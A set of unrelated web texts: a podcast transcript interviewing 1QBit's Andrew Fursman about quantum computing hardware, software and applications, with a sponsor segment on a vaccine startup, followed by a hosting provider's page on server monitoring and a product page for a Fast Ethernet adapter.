Although that sounds pretty heady, you can actually take a very clear example and just say one of 1QBit’s best partners and customers is the materials company, Dow. Dow has a lot of people that it employs to work in laboratories now alongside robots and other advanced devices but really, they’re doing the same work that you would have been familiar with if you were a chemist from the 1800s or the 1900s essentially answering the question of what happens if I pour this vial into that beaker. The reason that this is an interesting paradigm is because if you think about almost any other area of human endeavor, we’ve moved away from trying it out in the real world as a first step, and we typically will do some simulation in a simulated computer world. An example I love to use is just thinking about building an airplane. We don’t do the Wright Brothers thing anymore of building a model, throwing it off a cliff, and hoping that it flies. Instead, we have all of these advanced simulated environments where we can build a simulated plane in a simulated world that all exists in a computer, and to be able to have a great intuition and very good guidance around how to build that plane in order to make sure that it gets the best qualities of lift and flight. Andrew Fursman: We don’t really do that in the materials space right now because the ability for us to create simulated environments for the emergence of say, chemistry from physics is just significantly lower fidelity currently than what’s necessary in order to design new materials instead of discovering them. By taking that process and really moving into an ability to simulate the Quantum world, and to simulate the emergence of chemistry from physics inside this simulated environment, we can really progress advanced materials to the same paradigm that almost every other industry has followed. That’s one of the things that we see as an early win for Quantum computing. Thierry Harris: You’ve said that Quantum computing is the first real revolution in computing. Why is this? Andrew Fursman: The reason that I say that Quantum computing is the first real computing revolution is because of course, you could say that the first computing revolution was going from no computers to computers. That’s absolutely an incredible advance for humanity and the capabilities of our calculating abilities, but every advancement in computing that has really come from the first electromechanical devices through to vacuum tubes and transistors and integrated circuits, all of those different paradigms are better, faster, cheaper, more reliable versions of the same paradigm of computing. Quantum computing is not just an evolution of that same paradigm. It’s really about computing with new fundamental units of computation and those fundamental units are essentially, using quantum information instead of classical information to compute. That just gives you a very rich and diversified set of problems that are amenable to quantum computation. In our view, it’s not as though quantum computers are going to disrupt all of the things that we do with classical computers, instead, we think of quantum computers as augmenting what’s possible to compute in addition to all the classical computing that we have right now. 
The reason that we think of it as a bit of revolution is it’s almost like a completely new type of computing tool that will be bolted on to our existing computing capabilities in order to make it so that humanity has more computing capabilities, or can compute different types of problems which are forever beyond the reach of our current types of computer. Thierry Harris: I can see the acrobatics in what 1QBit is doing in essence because you have such a proximity to the hardware manufacturers of these quantum computers, but you’re also doing the translation of what those potential computers can be doing and attempting to create software in order to solve real industry problems that are out there. Explain then the quantum hardware ecosystem as it stands right now. Let’s say, for example, if we’re watching a horse race at Belmont, you’ve got Lucky Strike, you’ve got Duff Beer, you’ve got Carlsberg, you’ve got maybe Kokanee as well. I’m giving a lot of beer analogies. I don’t know why, it is early, but I’m just saying that there’s different technologies that are there in terms of different types of quantum computing technologies for these computers. Maybe you can give us a bit of a brief overview of what the ecosystem on the hardware side looks like, and then I’m going to ask you right after what the software side looks like. Andrew Fursman: That’s great. I think, what’s really important to understand about quantum computers is that we’re at an early stage where you could almost think about it as a bunch of organizations are all pursuing different ways to try and build these quantum computing devices. It would be like if we were back in the early days of computers and somebody was trying to build a vacuum tube, and someone else was trying to build a transistor, and someone else was trying to build an integrated circuit. The conversations that you would have in a world like that would be well, it’s probably easier to build a vacuum tube and to get that up and going but vacuum tubes are so large and are they scalable? Maybe, a transistor is a better path to go but transistors are so much more complicated to build. Even getting to one transistor is hard but once you have one transistor it’s much more scalable. These are exactly the kinds of conversations that are happening right now in the mainstream universal circuit model, quantum computing world where we have some people who are trying to essentially takes things that are already computers and make them quantum. You have other groups that are trying to take things that are already quantum and make them into computers. Even within those two fundamentally different approaches there are all kinds of different devices. For example, if you’re trying to take something that’s already a very quantum, mechanical entity and turn it into a computer, you might want to start with a photon. There are a number of organizations that are trying to build photonic quantum computers where the actual fundamental unit of computing is a photon but very similarly, there are other groups that are using things called trapped ion systems where the fundamental unit of computing is the quantum information that exists in an ion that is trapped in a magnetic field. We don’t really know at this point which of those approaches will be more scalable, or which one is likely to have longevity but we do know that there is incredibly diverse efforts occurring right now to pursue both of those paths individually. 
At the moment, it looks like the ion path forward has been more fruitful in the short term. We’re seeing some really exciting developments around organizations that are building quantum computers that gives these trapped ions as the fundamental method. At the same time, we have groups, large companies like IBM and Google and Microsoft are thinking about trying to take what we already know about building semiconductor computers and trying to turn them into super conductors that are capable of doing the same quantum computer calculations. All of this is happening simultaneously and as you talk about the horse race, there really is the exact same psychology that goes into analyzing this industry where just because your horse is in the lead currently, doesn’t mean it has the stamina to make it all the way to the finish line. There is a who’s-out-in-front-first mentality but there’s also wariness of the tortoise and the hare. Just because for example, you might be further behind in terms of the number of quantum bits of information that you can put into your device, doesn’t necessarily mean that your device is a worse device. It might just mean that it’s harder to get the first couple of bits going but it’s very scalable. For anybody who’s really on the sidelines looking into what’s happening in hardware in quantum computing, it’s a very exciting time because everything is in flux. All of these technologies are rapidly developing. It really does look a little bit like a horse race where you’re trying to understand who is out in front, and do they have the ability to stay in front. What’s really exciting is because all of these devices are in some sense, interchangeable in the same way that you can do the same kind of addition on a vacuum tube as you can do with the transistor. Essentially, you would hope that the same problems that you could run on an ion trap computer wouldn’t be able to be run on a photonic computer. From the perspective of an organization that is trying to build applications for quantum computers, as opposed to trying to pick a horse, instead, you can just cheer on the race because any progress is exciting from the perspective of actually taking these technologies and making them available to industry. Thierry Harris: Really fascinating stuff, very exciting. Maybe there will be a show just to describe this horse race as it goes along at some point for folks who are interested out there because it’s tremendously fascinating, and will have a huge impact. Let’s talk about the software portion right now, and explain a little bit about what companies such as yours are doing with, as you said, the different kinds of horses that you’re picking with the photons, and then with the ions. What your challenge is in producing that software and then marrying it to the industry and the industrial problems that are out there in the world that you’re attempting to solve? Andrew Fursman: In exactly the same way, I find it very helpful to use some analogies to classical computing because people are a little bit more familiar with that paradigm. Many of the mysteries of quantum computing are actually unhelpful in terms of understanding the value of these quantum devices. I think it’s really helpful to demystify the actual computers themselves and to really think about the fact that much like a classical computer way back in the day, if somebody brought you a very fundamental early-stage computing prototype, you would say, “Oh, great. 
You’ve made a device that it’s capable of adding in binary, that’ll be so helpful for all the binary addition that I do as a banker, or as a lawyer.” All of the people who use computers every day now are clearly not interested in the fundamental capabilities of those devices, instead, they want to use Microsoft Word, or they want to be able to play Minesweeper. That idea of being able to understand the native capabilities of a computer in the classical world, that would be something like adding in binary, and having the vision to be able to say, “Wow, if you can add in binary, you could actually make a word processor.” It’s a pretty big leap, but that leap happens outside of the hardware, that’s really the realm of software. Understanding what are the raw capabilities of these quantum computing devices? How can I actually connect that to an open need that industry has, essentially, where computers today are not capable of solving very complicated problems? Is there some overlap there? Is there something that quantum computers can do that classical computers are not very good at? Because, if you can do something with the classical computer, and a quantum computer, it’s probably better to use a classical computer. They’re more advanced, there’s better ability to understand. We have many years of hardware development. We try and answer two questions. One, what can you do with a quantum computer? That’s really where we started. Now we’re moving I think, into a much more interesting question, which is, what should you do with a quantum computer? I’m sure that’s probably an area we should dig into. Thierry Harris: You also said something very interesting about the potential of quantum computing in the sense that what it does is that it allows us to focus more on what questions we should be asking as humans, which is something that we do very well with our curious minds, and our storytelling capabilities, as opposed to trying to solve those problems once we put these fundamental questions out there or very quirky questions. It doesn’t have to be very serious all the time, and let the computer do what the computer does best, which is compute and then solve the problem to provide us an answer that could be of usefulness for us, really thinking of the computer as a tool. Maybe you can elaborate a little bit on that thought, Andrew for us because I think it’ll help us, again contextualize why quantum computing is something important to be working on right now. Andrew Fursman: Absolutely. One of the things that’s most interesting to understand about where we sit as a species in terms of producing new knowledge, especially in certain areas, like advanced materials and drug discovery, we talk today about drug discovery, material discovery. It’s not too far from the truth, that the way that you find a new drug today is you go into a region of the Amazon, start licking a bunch of trees, and the ones that make you feel funny, you say, “Hey, there might be something here,” and you go and explore why this thing did what it did. That’s an interesting paradigm. Of course, we’re getting much more sophisticated in our understanding of the types of effects that we would like to see. You can imagine, it’s pretty laborsome, laborious to have to go out into the world and just start trying everything in order to see what it does. That paradigm of discovery can be flipped into a paradigm of design. 
If you have the ability to say, “I can create in a virtual environment, a new material that’s never actually been created in the real world. By analyzing it in this virtual world, I have the ability to understand what it would be like if I were able to produce it.” That allows me to be able to produce a whole bunch of virtual materials, analyze their properties, and select the ones that are most useful for certain applications.” You’re really starting by saying, “I would like a material that looks like this.” Then you can go and design that material in your virtual world. Once you’re convinced that you’ve designed something that will achieve it, then the problem becomes, “How do I produce this material that I know I want?” Instead of, “I’ve produced this material but I need to figure out what it’s for.” I think that if you can imagine the ability to search massive amounts of potential materials without having to actually build them first, will really expand our ability to produce novel, bespoke materials that are helpful for particular engineering challenges. We think that this will start by producing really basic things like catalysts, very small pieces of matter that speed up or slow down different reactions. It will expand from these very small pieces all the way through to more advanced materials, differentiated polymers, and eventually, we think into the interactions of the human body and the material world in a way that is really what drugs are. Being able to change into a mode of saying, “I have this particular challenge occurring in my body. What do I need to produce in order to influence my body to change its behavior?” These are deep questions that are not going to be answered overnight. The journey of the next 100 years of quantum computing is really going to be about having the tools for the first time to have a real shot at solving these problems in a very succinct and detailed way. I think that quantum computers are going to make their first mark on the world by really transforming the physical world, allowing us to build materials, for example, that are much stronger and lighter than the ones that exist today, or that have particular characteristics that exactly suit the needs of some of the most challenging applications, where our current limitation is being able to actually produce the materials that give the desired effect that we want. We often know what we would like, we just don’t know how to actually produce those things. That’s one of the big changes that I think we’ll see coming from quantum computing. Thierry Harris: You’re describing this with regards to materials, but it can also, as you said, be materials for drug discovery. You’ve talked a lot in the past about the financial world, a little bit earlier in this podcast as well, in terms of some of the problems that they have in terms of predicting markets, and high finance, risk assessment, and analysis. And very interesting when you were talking about physics and finance going together. It’s quite beautiful and eloquent to see the math there, behind that. Again, great stuff we’re looking now at what 1QBit is within that realm. You’ve said that 1QBit acts as a bridge between the technology at the fundamental level, the new hardware that’s being produced, and the real-world applications. 
Outside of Dow, can you give us a few more industries or sectors that you’re interfacing with and what kinds of problems that they’ve been presenting you, just so we can, as students studying the business portion of this understand the potential of your market? Andrew Fursman: Yes, I really like exactly the setup that you just gave. I think that the analogy of computational finance, the traditional method of computational finance is a great allegory for how we could see the development of quantum computing. That is to say, many of the initial uses of traditional computers within the finance world came from repurposing algorithms that were designed in order to simulate the physical world. For example, a lot of the work that was done in options pricing, which is a computationally expensive, or a challenging form of calculation that’s helpful to know how much you should pay for a particular financial instrument, is really all about repurposing algorithms that were initially designed in order to correct the trajectory of rockets. In the same way that you could say, back in the day, computers were used to simulate the physical world in order to help to guide rockets. Then, that form of mathematics was repurposed into the financial market in order to provide capabilities that seemed very far from the initial area of exploration, but that opened up entire new areas for computation and new areas of human understanding. We think that some of the algorithms that are first developed in order to do the simulation of the physical world through a quantum information lens can then be repurposed into different areas in order to provide real value outside of physically simulating the physical world. A great example would be, we believe that some of the fundamental calculations that are helpful to simulate the physical world can also be used to animate new forms of machine learning. In some cases, old forms of machine learning where the bottleneck to wider adoption was just that the computational capabilities of classical computers didn’t mate nicely with the problems that were necessary to solve in order to harness these forms of machine learning. If we can take some of the interesting sampling capabilities of quantum processors that are developed in order to do material discovery and repurpose that into a more abstract information processing to animate forms of machine learning, you could imagine similar algorithms being deployed in order to produce much more robust artificial intelligences, for example. That’s the exciting work that really, you can only make those connections if you have both a great understanding of, say, the materials industry, and a very detailed understanding of the quantum devices that are going to be applied to solving those problems. Then comes the third step of being able to take those technologies and apply them to an adjacent field. 1QBit has actually developed as a very inter-disciplinary, multi-disciplinary collaborative approach where we try and bring together researchers from very different fields in order to understand where those real points might be, and to really help produce innovation at those edges that are between different spaces. That’s been an exciting part of the 1QBit journey. Thierry Harris : I asked Andrew to unpack how we got from the idea to quantum computers in the 1980s to where we are today, and what 1Qbit’s relationship was with one of their quantum hardware suppliers, D-wave. 
Andrew Fursman: Quantum computers, as an idea, have been around since the 1980s in the same way that you can say time machines have been around since the 1800s in that people have thought about them. It's only really right this moment that we're starting to see the first realizations of that idea come to fruition. These are the first devices that could really be called quantum computers in the way that people imagined quantum computers might evolve. This moment is really the fulfillment of a journey that started in the 1980s, saying, "I think you could probably build a machine that looks like, for example, an IonQ ion trap device." Now, we're just starting to see those things emerge. When I was speaking earlier about the different types of quantum computers, I intentionally really spoke about what people usually mean when they talk about a quantum computer, which is a universal circuit model quantum device. But you can also do many different types of calculations utilizing these same types of quantum information processing fundamentals. For example, in traditional computing, there are digital computers, which are the types of computers that most of us are familiar with, but there are also analog computers, computers that operate less in the binary 0/1 realm and instead operate on a continuous spectrum. These are much less common, but the history of traditional computing is one of both analog and digital computers. We have the same distinction within quantum computers. An organization like D-Wave made a decision early on to try and say, "Maybe universal circuit model quantum computers will emerge in the distant future," but D-Wave really has its roots all the way back to 1999. They made a very conscious choice to say, "Let's try and see if there's something that you can do with quantum information processing, which isn't as challenging as building a universal quantum computer, but which can still solve very specific problems." You could think of it as an application-specific quantum information processor. That concept shouldn't be too foreign to your listeners because, for example, the rise of machine learning has been heavily advanced by GPUs or graphics processing units, which are themselves application-specific computing components. The D-Wave machine, the D-Wave quantum annealer, is an analog quantum computer that is specifically designed to answer what are called quadratic unconstrained binary optimizations, which really just means answering an optimization problem. They're not able to perform things like Shor's algorithm that might be used in the future to break encryption, and they're not particularly useful for the chemistry applications that we were talking about previously, although these machines do have some simulation capabilities. In general, it's about saying, "What's the low-hanging fruit and how do I try and take a shortcut to a useful device by making a specific thing for a specific purpose, instead of trying to build a device that has all of the rich capabilities that we anticipate for future quantum computing devices?" There's actually an entire subset of the quantum computing market that spans that spectrum. For example, one of our partners, Fujitsu, has built an application-specific integrated circuit which simulates the annealing process, so we call it a digital annealer. This is the most classical exploration of the capabilities of near-term quantum computing devices.
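[Editor's note: For readers unfamiliar with the problem class Fursman mentions, the sketch below is a minimal illustration of a quadratic unconstrained binary optimization (QUBO), the kind of problem a quantum annealer is built for. The tiny cost matrix and the brute-force search are hypothetical teaching devices, not D-Wave's interface or a real workload.

```python
import itertools

# A QUBO asks for the binary vector x (entries 0 or 1) that minimizes x^T Q x.
# Q encodes the cost of switching each variable on and the interactions
# between pairs of variables.
Q = [
    [-1,  2,  0],
    [ 0, -1,  2],
    [ 0,  0, -1],
]

def qubo_energy(x, Q):
    """Evaluate the QUBO objective x^T Q x for one binary assignment."""
    n = len(x)
    return sum(Q[i][j] * x[i] * x[j] for i in range(n) for j in range(n))

# Brute force is fine for 3 variables; an annealer targets problems with
# thousands of variables, where exhaustive search is hopeless.
best = min(itertools.product([0, 1], repeat=3), key=lambda x: qubo_energy(x, Q))
print(best, qubo_energy(best, Q))  # (1, 0, 1) with energy -2
```
]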
The D-Wave machine is again one of these analog machines, but there is other work being done that has the capability to do some of that analog computing, including by our partners at NTT, who have some very exciting devices which utilize exotic forms of computation in order to answer these same problems. Even ion trap computers are capable of doing analog computation. I think the journey from no quantum computers through to universal fault-tolerant error-correcting quantum computers is one where we don't know exactly what the path might look like, but some organizations have said, "Let's try and take a minimum viable product approach as opposed to going for a waterfall approach of, step one, build a big quantum computer." Instead they are saying, "How could we build a specific quantum calculator?" Even aside from the types of distinctions that I drew at the beginning, where we were talking about the difference between photons, ions, and superconducting machines, there are different types of devices that you can make with those different components. The D-Wave machine is one exploration of a specific type of machine. Of course, D-Wave is a company which could build many different types of devices. The current D-Wave processors have really been looking at this niche and specific idea of optimization and a few other adjacent fields as a toe-hold into this wider world of quantum computing. What's nice is that with such a diversity of approaches and a diversity of fundamental units of computing, we really have a whole bunch of different ways of trying to build these initial devices, so that there's a plurality of approaches. That's really exciting for someone who is trying to harness these new capabilities, because each of these different machines has different strengths and weaknesses and time horizons. As somebody thinking about applications, we really cheer on that diversity. Thierry Harris: I asked Andrew to compare the idea of using quantum computing to that of using a utility. Andrew Fursman: Yes. I think about the distinction of a computing utility versus a computing product as something that we're all actually intimately familiar with now. If you use almost any application on your computer today, you're not just using your local computer; you're using the computing of the cloud. For example, I actually have very little understanding of what types of computation happen on the backend of making a request to something like Google Maps. You just want to know, "How do I get from here to there?" You're able to clearly articulate the problem. You say, "I am currently in this location. I would like to get to that location. Please give me the steps that I need to take in order to go there." You send that off to the cloud. They do some processing on the backend. It might be done with CPUs or GPUs or FPGAs or, in the future, quantum computers. The important thing is I don't really care as a consumer. I just want to make sure that I'm getting the best directions, and that I'm able to get from here to there with the least number of turns, spending the least gas, et cetera. That's how I think that quantum computing is actually going to be most widely deployed into people's lives. It's in a way where it's almost invisible. Meaning, if we do things well, you're not going to be excited about utilizing a quantum computer because it's a quantum computer. You're just going to be excited that you get better directions from Google Maps, for example.
That’s a purely hypothetical example, but I think it illustrates the difference between buying a computing device versus just getting the utility that comes from that knowledge. The way that we imagine interacting with quantum computers in the medium term is actually exactly the same way that 1QBit interacts with computers today, which is if we’re interested in solving a chemistry problem, then we engage with a cloud-hosted quantum computer. We take the industrial framing of the problem and convert it into a form that the quantum computer is able to understand. We then pass that information to the quantum computer, which solves the problem in its native form. We then take that solution and interpret it back into the language of the industrial problem. Ultimately, the industrial user just gets a solution to the problem that they’re looking at, whether it’s something like, “How should I build this material?” or “What are the properties of this material?” or “What should I trade in a financial market?” Ultimately, the reason that these things are useful is not because they’re using quantum information to solve those problems. It’s because they’re providing better answers than the next best alternative that we have available. The idea that the product is really the answer from the computer as opposed to the computer itself is that distinction. Of course, because cloud computing already works this way and actually the initial architecture and use of computers was many people sharing time on these big mainframes. This is not really a departure from the longer history of computation. In fact, it’s more the norm as opposed to the exception. Andrew Fursman: 1Qbit’s perspective is that exactly as I just described, people ultimately won’t want to use quantum computers for the sake of quantum computers. They’ll want to use applications that harness quantum computers to provide better answers because they care about better answers. 1Qbit’s approach is to say, we have some visibility into the types of industries that are likely to be augmented by, or disrupted by quantum computers. Our interest is in getting into those industries, getting out in front of quantum computers as opposed to the capabilities coming along, and then saying, wow, we should really think about getting into quantum chemistry. Instead, we’re getting into quantum chemistry, knowing that success within quantum computers will provide a really unique advantage. To the extent that we believe that quantum computers or exotic forms of computation might augment machine learning capabilities, we have been doing a lot of work to be able to commercialize current methods of artificial intelligence within industries that we think are relevant to quantum computers, so that if quantum computers provide new capabilities, we’re already in the industries that can benefit from those capabilities. That’s what we’ve tried to do over and over again, is to be positioning ourselves, to be the best-positioned organization, to harness the capabilities of these devices while at the same time, using those insights to partner with the hardware organizations and to do our own fundamental research, to understand how could you build better devices that are more capable of accelerating these industries. Thierry Harris: 1Qbit received funding from Canada’s Digital Supercluster. A government sponsored program focused on fostering innovation in digital technology companies. Andrew elaborates. 
Andrew Fursman: One of the things that we believe is that there’s a real capability for quantum information processing to augment the capabilities of artificial intelligence and machine learning. In order to prove that there is real industrial value, we think that it’s very valuable to be out in the marketplace, selling products and services that take advantage of that fundamental artificial intelligence capability. In the case of the supercluster work, we have produced a software suite that is capable of providing a co-pilot for radiologists, essentially helping them understand and to point out more abnormalities. Our first product was a chest X-ray anomaly detector that’s useful for detecting the types of pneumonias that can come from things like the current COVID pandemic. By essentially having a product that harnesses the state-of-the-art in machine learning capabilities, we know that to the extent that that state of the art is advanced by any of the technologies that we work within our hardware innovation lab. We now have a path all the way from the hardware, right to the industrial output, which is, in this case, better outcomes for people in the Canadian health system. We have the ability to say, if I swapped out my current processor for this new device, does that further improve the outcomes? To the extent that that answer is yes, that we know that that’s a useful advancement on the hardware and to the extent that the answer is no, we know that that hardware is not yet ready for commercialization. Essentially, we use the industrial reality as the measuring stick by which we judge the meaningfulness of any of these advances on the hardware side. Thierry Harris: While the market adoption of the technology is a key measuring stick for 1Qbit’s success. The advancement of pure science is also important to the company. Andrew Fursman: As a geek, I think and I should say as a team of geeks, I think all of us really have a soft spot for advancing technology just purely from a scientific perspective. Because we’re doing this in the context of a business, of course, the real measuring stick is, are you able to produce more value than what it costs to get there? I think we love to produce technology because we believe technology produces value and utilizing our market success as a measuring stick is a very helpful way to ensure that we’re not just climbing Mount Everest because it’s there. Thierry Harris: The development of Quantum computing will come from partnerships from core Quantum companies like 1Qbit with various industry players to help solve problems in their respective fields and to find new opportunities to develop applications using the power of quantum technology. In this spirit of collaboration, I asked Andrew to put out a question for our audience to ask them what he would like to see people studying 1Qbit to be working on. Here is what he had to say. Andrew Fursman: Well, back to your point previously of how long people have been thinking about quantum computers it’s very interesting that some of the most important algorithms in quantum computers were developed before those quantum computers really existed. A great example is Shor’s algorithm, the procedure that you would take with a quantum computer in order to improve the factoring capabilities of our computational capabilities as humanity. 
This is very exciting because it shows that even without access to a quantum computer if you understand the fundamentals of quantum computing, you can develop applications without even having access of these machines. What’s really different today than when Peter Shor was first thinking of Shor’s algorithm is now we actually have fledgling quantum computers that we can use to test those assumptions. What I would recommend is that as opposed to trying to think about quantum computing in this abstract, it’s just a more powerful computer, if you really want to make an impact in this field, the first thing you need to do is to put in the work to understand how these machines really operated at low level, and then you can use your creativity and imagination to expand the fundamental computing capabilities at these low level of what you might think of as the building blocks upon which you can build applications. At the moment, we actually have a very small number of these building blocks and I think that as more people put their minds toward this, we’re going to see that, although there’s maybe five or six really exciting fundamentals that we’re aware of right now, there are probably thousands more that just haven’t been discovered because not enough people have been thinking about this. [start end music] Andrew Fursman: I love the idea of more people first learning about how these machines work at a low level and then imagining what other things they could do. That’s going to really blow up this industry and help expand the usefulness of quantum computers to many different areas that we can’t even imagine today. Thierry Harris: All right, well, let’s make that happen. Andrew Fursman: Absolutely. That’s very exciting, Andrew. Thank you so much. Anything else you would like to add? Andrew Fursman: I just want to say thanks for the opportunity to connect with your listeners. To the extent that people are interested in learning more about this, of course, they can visit our website at 1QBit.com. For people who are very excited to dig in and maybe think a little more, 1Qbit’s always bringing on interns and practitioners. We’re expanding all across Canada, from Vancouver into Calgary and Edmonton. We have great partnerships with the Saskatchewan Health Authority. It’s been important for that supercluster work that you’ve talked about. We have new offices opening up in Quebec and we have a deep partnership in Sherbrooke. We’re trying to take a Pan-Canadian approach to quantum computing for the benefit of all humanity and if you’re excited about that, we’d love to hear from you. Thierry Harris: That’s all for today folks, there is so much more we could discuss with quantum computing, and we haven’t even touched upon adjacent topics such as quantum communication networks and quantum sensor technologies. If you’d like to share further research on the quantum ecosystem, write us at solutions@ie hyphen knowledgehub.ca and we’ll add links to our episode page to keep the conversation going. [begin promo music] Narration: And now a final word from our sponsor, the IE-KnowledgeHub. IE-Knowledge Hub is a website dedicated to promoting learning and exchanges on international entrepreneurship. If you are an education professional looking for course content, an academic researcher seeking research material , or someone interested in business innovation check out IE-Knowledge Hub. Let’s pickup where we left off for Prevtec Microbia, a small biotechnology company creating live bacterial vaccines to help counter E. 
Coli in swine. Eric Nadeau: We had to take a decision what to do with it? At that time we were thinking more to, to, to develop and to provide to, to the veterinarians, it was not a business sense. It was ok then we have this the veterinarians need it, what we can do to transfer this to the veterinarians? Narration: That’s Eric Nadeau, co-founder of Prevtec Microbia. Nadeau is describing the ideation behind creating Prevtec. He had developed the coliprotech vaccine as a post doc student under the supervision of Dr. John Fairbrother, a world expert on E.coli. He knew his technology could work. But how could he get from the university science lab to building a business? Eric Nadeau: We went through all the process into the university. We have to do a declaration of invention, and after that to convince the dean of the faculty that our project is solid. And it was difficult for them, because we had John Fairbrother as a fundamental scientist, and not a business person, and his dolphin, a young post doctoral student. and it took two years to convince the faculty and the university by itself, the University of Montreal. Narration: To help them get up and running the firm hired an experienced CEO, Michel Fortin. Fortin knew that to be able to make Prevtec into a profitable business he had to get the regulatory approval in the right markets. Michel Fortin: When I started with the company we had the first vaccine which is coliprotec f4 which is for specific disease in the swine industry. And our objective was first to get this product approved in Canada to distribute it in Canada which is our home base, which was easier for us to do all the tests and do everything that is required to get to that license or regulatory approval. With the objective that after that once we get the first product out in Canada is to take this product to other countries to have a global approach. And one of the first opportunities was going to be in Brazil. Because brazil has a very large production of swine, and also the regulatory people work very closely with the regulatory people of Canada. So with our Canadian dossier, we were able to start the regulatory process in Brazil, without incurring very very expensive costs. Then after that we decided to get our product distributed in Europe. Why europe? We are an alternative to antibiotics, which is getting controlled and/or banned. So it was a prime market for us. Narration: You’ve been listening to segments of the Prevtec Microbia video case study. Learn more about how to take a technology from the laboratory to the market by watching their full case available for free at IE hyphen knowledge hub dot ca. [End promo music] Thierry Harris: Market Hunt is produced by Cartouche Media in collaboration with Seratone Studios in Montreal and Pop Up Podcasting in Ottawa. Market Hunt is part of the IE Knowledge Hub network. Funding for this program comes from the Social Sciences and Humanities Resource Council of Canada. Executive producers Hamid Etemad, McGill University, Desautels Faculty of Management and Hamed Motaghi, Université du Québec en Outaouais. Associate producer Jose Orlando Montes, Université du Québec à Montréal. Technical producers Simon Petraki, Seratone Studio and Lisa Querido, Pop up Podcasting. Show consultant JP Davidson. Artwork by Melissa Gendron. Voiceover: Katie Harrington. You can check out the IE-Knowledge Hub case studies at Ie hyphen knowledge Hub dot ca. For Market Hunt, I’m Thierry Harris, thanks for listening. [End Credits Music]
systems_science
https://elhostingbarato.com/en/definitions/monitoring-and-rebooting/
2022-08-20T06:13:20
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573908.30/warc/CC-MAIN-20220820043108-20220820073108-00136.warc.gz
0.958046
384
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__94300357
en
Monitoring and Rebooting in VPS
You can benefit from our service with each VPS plan that we offer, and you can order the Managed Services bundle at any time with no more than several mouse clicks, either when you register or through your billing area. Our system admins will monitor the system processes on your VPS not only manually, but also with an advanced automated system, so they will be notified the moment something goes wrong - a script that uses too much memory or CPU time, a process that has stopped responding or has gone offline for unknown reasons, and so on. They will investigate the cause of the issue and will restart your virtual private server. With this upgrade you will save the money you would otherwise spend on overpriced third-party monitoring services, which some companies offer but which cannot do anything to solve a problem even if they alert you about it. Our system administrators, in contrast, have both the capabilities and the access to do this right away.
Monitoring and Rebooting in Dedicated Hosting
The Managed Services bundle can be added to any of our Linux dedicated hosting services whenever you want, so as soon as you decide you need it, you can order it with a few clicks and our administrators will enable an array of automated checks on the status of different system processes on the hosting machine. This will save you a lot of money on third-party monitoring services from firms that cannot resolve a problem even if they identify one, since they will not have access to your server. Our experienced staff can quickly resolve any problem - a frozen system process, a script that is consuming a lot of processing time or memory, etc. They will find out what caused the problem, take care of it in the most suitable way, and reboot the hosting server if that is required to restore its correct functioning. Thus you will not need to worry about potential problems or deal with administration tasks.
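As an illustration of the kind of automated check described above - flagging processes that use too much CPU or memory so that an administrator can step in - here is a minimal sketch using Python's psutil library. The thresholds and the library choice are assumptions made for illustration; the provider's actual monitoring system is not described on this page.

```python
import psutil

# Illustrative thresholds; a real monitoring policy would be tuned per server.
CPU_LIMIT = 80.0   # percent of one core
MEM_LIMIT = 25.0   # percent of total RAM

def find_runaway_processes():
    """Return (pid, name, cpu%, mem%) for processes over either threshold."""
    offenders = []
    for proc in psutil.process_iter(attrs=["pid", "name"]):
        try:
            cpu = proc.cpu_percent(interval=0.1)
            mem = proc.memory_percent()
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue  # process exited or is not visible to this user
        if cpu > CPU_LIMIT or mem > MEM_LIMIT:
            offenders.append((proc.info["pid"], proc.info["name"], cpu, mem))
    return offenders

if __name__ == "__main__":
    for pid, name, cpu, mem in find_runaway_processes():
        # A real system would notify an administrator instead of printing.
        print(f"ALERT: {name} (pid {pid}) at {cpu:.0f}% CPU, {mem:.1f}% RAM")
```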
systems_science
https://inter-tech.de/en/products/archive/networking/ad1101
2021-06-24T12:13:32
s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488553635.87/warc/CC-MAIN-20210624110458-20210624140458-00182.warc.gz
0.652544
556
CC-MAIN-2021-25
webtext-fineweb__CC-MAIN-2021-25__0__184186686
en
EOL
Fast Ethernet PCI Adapter
The netis AD1101 Fast Ethernet PCI Adapter is a highly integrated and cost-effective adapter that supports 32-bit data transfer and reduces CPU load by using a bus-master architecture. It also provides WOL and Boot-ROM support. The netis Fast Ethernet PCI Adapter keeps costs low and removes usage barriers, making it the easiest way to upgrade a network from 10 to 100 Mbps. It supports both 10 Mbps and 100 Mbps network speeds in Half-Duplex and Full-Duplex transfer modes, using Auto-Negotiation to detect the network speed. It can also be used with most modern operating systems.
- Supports a 32-bit PCI interface
- Complies with the IEEE 802.3 10Base-T and IEEE 802.3u 100Base-TX specifications
- Supports Full-Duplex, achieving up to 20M/200M network bandwidth
- Plug and Play
- Supports Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8/8.1, Linux, MAC OS
Hardware
Standards: IEEE 802.3 10Base-T, IEEE 802.3u 100Base-TX
Interfaces: 32-bit PCI-E 1x, 10/100Mbps RJ45 port, Auto-Negotiation, Auto MDI/MDIX
LED: LNK/ACT
Cabling Type: UTP CAT 5 EIA/TIA-568 100-ohm screened twisted pair (STP)
Data Transmission Rate: 10/100Mbps (Half-Duplex)
WOL, RPL/PXE BOOT-ROM
Other Data
Network Driver: Windows 98 SE, Windows ME, Windows 2000, Windows XP (32/64 bit), Windows Vista (32/64 bit), Windows 7 (32/64 bit), Windows 8/8.1 (32/64 bit), MAC OS 9.0/10.04/10.1/10.2
Certification: FCC, CE
Environment: Operating temperature: 0°C~40°C; Storage temperature: -40°C~70°C; Operating humidity: 10%~90% non-condensing; Storage humidity: 5%~90% non-condensing
Dimension (l/w/h): 120 x 125 x 20mm
Guarantee: 36 months
Scope of delivery & Features
Scope of delivery: Low Profile Bracket, Quick Installation Guide
Logistical data
Shipping Unit: 1 Pcs
Packing Unit: 100 Pcs
Weight: net = 0.04kgs, gross = 0.12kgs
Item number: 88883037
EAN-Code: 6951066950287
No further information is available for this product.
No special accessories are available for this product.
systems_science
http://newtectimes.com/?p=23492&upm_export=doc
2019-03-22T04:43:11
s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202628.42/warc/CC-MAIN-20190322034516-20190322060516-00393.warc.gz
0.936195
732
CC-MAIN-2019-13
webtext-fineweb__CC-MAIN-2019-13__0__54132681
en
By Brock Weir
